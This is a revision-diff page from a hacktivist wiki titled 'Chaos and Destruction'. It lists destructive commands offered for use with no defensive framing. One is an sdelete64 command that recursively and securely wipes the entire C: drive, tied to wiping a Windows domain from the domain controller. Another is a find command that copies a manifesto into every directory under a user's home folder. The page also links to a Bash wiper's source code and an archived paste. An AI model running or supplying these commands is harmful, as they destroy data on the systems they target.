Chaos and Destruction: Difference between revisions

From Enlace Hacktivista
Jump to navigation Jump to search
Line 5: Line 5:
Print your manifesto across a system
Print your manifesto across a system
* <code>find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;</code>
* <code>find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;</code>
[https://0xjet.github.io/3OHA/2022/12/18/post.html Bash wiper]. [https://github.com/0xjet/bash-malware/blob/main/AWFULSHRED/AWFULSHRED_beautified.zip Source]
* https://web.archive.org/web/20230724204753/https://pastebin.com/raw/1LcPihYr

Revision as of 20:49, 24 July 2023

Windows

  • Guacamaya (2:13:35 Wiping windows domain with sdelete on the domain controller) sdelete64.exe -accepteula -r -s C:\*

Linux

Print your manifesto across a system

  • find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;

Bash wiper. Source